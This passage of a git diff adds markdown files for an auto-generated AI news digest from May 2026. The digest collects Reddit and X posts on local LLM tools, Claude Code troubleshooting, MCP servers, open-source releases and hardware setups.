Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \- back behavior wrong, no system back \- flat surfaces, no Material elevation \- tab bar where a nav drawer or bottom nav belongs \- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \- Product intent: hierarchy, flow, states. Invariant across platforms. \- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y… + +--- + +## [GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.](https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, open_source, github_release + +> Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. 
**What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. * Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm… + +--- + +## [macOS support in Lemonade has graduated out of beta!](https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the updated iPhone app, which can access all of this from your phone!
GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk + +--- + +## [Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result](https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.94 +Tags: api_update, mcp, developer_tool + +> [error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: "sdk\_stream\_ended\_no\_result", had\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \[Stall\] stream\_idle\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context? + +--- + +## [WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. 
Does anyone know the solution?](https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t… + +--- + +## [I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned](https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a 
loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa… + +--- + +## [Interconnects newsletter reviews wave of open AI releases. Open AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.](https://www.digg.com/ai/09imapy5?rank=7) +*Digg AI* | Score: 1.00 +Tags: product_launch, developer_tool + +--- + +## [How I started programming differently over the last year. What about you?](https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs.
But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t… + +--- + +## [LLM Phone Home: Reliable Apps that can deliver inference from local backend](https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. 
Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability). + +--- + +## [Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode](https://x.com/frameo_ai/status/2055642282796400821) +*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers. + +--- + +## [How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer](https://x.com/Scobleizer/status/2055566706714845328) +*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework. + +--- + +## [Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!](https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. 
It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source! + +--- + +## [Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?](https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.88 +Tags: developer_tool, cli_tool + +> Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \`--chrome\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. \*\*Setup:\*\* \- Claude in Chrome extension installed and signed in \- Same account on [claude.ai](http://claude.ai) and Claude Code \- Extension shows as active in Chrome toolbar \*\*What works:\*\* \- ✅ Claude Code CLI (\`claude --chrome\`) connects to the browser fine \- ✅ Extension itself appears active and logged in \- ❌ [claude.ai](http://claude.ai) web app: consistently returns "Browser extension is not connected" \*\*What I've already tried (nothing helped):\*\* \- Restarted Chrome \- Restarted PC \- Logged out and back into [claude.ai](http://claude.ai) \- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow "claimed" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr… + +--- + +## [Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin](https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 +Tags: open_source, developer_tool + +> Tired of 
the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \- YouTube, Instagram, X/Twitter \- Best / 1080p / 720p / 480p / MP3 \- Live progress bar with ETA \- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22 + +--- + +## [Using Claude chat for making Apps.](https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 +Tags: api_update, cli_tool + +> I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home. 
+ +--- + diff --git a/data/digest-2026-05-17.md b/data/digest-2026-05-17.md new file mode 100644 index 0000000..94e8b0c --- /dev/null +++ b/data/digest-2026-05-17.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-17** | 15 stories | Auto-generated from 420 archived stories + +--- + +## [I built SeeFlow - architecture diagrams that actually run, wired to your live app](https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/) +*Reddit r/ClaudeAI* | 17/05/2026 | Score: 1.00 +Tags: mcp, open_source, developer_tool, tool_update + +> Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source + +--- + +## [ROCm 7.13 nightly adds strix halo optimizations](https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> [https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 "Strix Halo" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). 
[https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module + +--- + +## [I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!](https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/) +*Reddit r/StableDiffusion* | 17/05/2026 | Score: 0.78 +Tags: api_update, open_source, tool_update + +> Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! **Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — "The one I didn't know I needed" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. 
* Click **"Extract Locations from… + +--- + +## [Are local models good enough yet for AI meeting memory?](https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case? + +--- + +## [NeuralCompanion](https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/) +*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. 
GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop… + +--- + +## [Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.](https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: product_launch, cli_tool + +> [Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). 
* **Integrated HF Downloader:** Sear… + +--- + +## [Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription](https://x.com/lordsa_m/status/2055959075012104631) +*X search / AI model updates* | 17/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription + +--- + +## [Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?](https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/) +*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, "Wan2.2-Distill-Models" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it? + +--- + +## [Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> >**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***"sweet spot"*** *for large language models. 
It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * … + +--- + +## [2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:](https://x.com/OliverB72157882/status/2055972796711502049) +*X search / AI model updates* | 17/05/2026 | Score: 0.98 +Tags: api_update, tool_update + +> 2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes: + +--- + +## [I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source "Claude Command Center". Here's the playbook they came up with.](https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/) +*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.94 +Tags: open_source, tool_update + +> A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours.
:) \[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \*ON PURPOSE\* 100% built by the AI who created the agents \[happy to share th… + +--- + +## [Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?](https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/) +*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.54 +Tags: api_update, cli_tool + +> So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current 
usage of the models context windows is currently at in %. **Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita… + +--- + +## [LLM's on Android (Snapdragon 8 Elite) MOE Experience](https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: developer_tool + +> So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\_XS and MXFP4\_MOE since with what I have tested MXFP4\_MOE is quite faster but for the size IQ4\_XS can't be beaten. Q4\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). 
Goes without saying but Q4\_K\_M is also quite reliable from a speed/quality/size s… + +--- + +## [While waiting for Fara-1.5 for my coding harness](https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: agent_tool + +> Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled "skills" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le… + +--- + +## [Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4](https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: agent_tool + +> CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\_0 to mitigate some weird behavior I was seeing at lower quants. 
Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. My ik\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: "${ik-llama-cuda}/bin/llama-server" + " -m ${modelPath}" + " --host 0.0.0.0" + " --port ${toString cfg.port}" + " -c ${toString cfg.contextLength}" + " -ngl 999" + " --cpu-moe" + " -sm graph" + " -fa on" + " -t 16" + " -tb 16" + " -b 4096" + " -ub 4096" + " -np 1" + " -muge" + " -ger" + " --jinja" + " --metrics" + " --temp 1.0" + " --top-p 0.95" + " --top-k 40" + " --min-p 0.01" + +--- + diff --git a/data/digest-2026-05-18.md b/data/digest-2026-05-18.md new file mode 100644 index 0000000..cdc188c --- /dev/null +++ b/data/digest-2026-05-18.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-18** | 15 stories | Auto-generated from 665 archived stories + +--- + +## [obsidian-mcp-server: v3.2.0 Released](https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 1.00 +Tags: api_update, mcp, product_launch, developer_tool + +> [obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on 
`obsidian_list_commands`. Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues! + +--- + +## [Witchcraft, fast local semantic search on top of SQLite [P]](https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/) +*Reddit r/MachineLearning* | 18/05/2026 | Score: 1.00 +Tags: api_update, open_source, cli_tool + +> **Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as 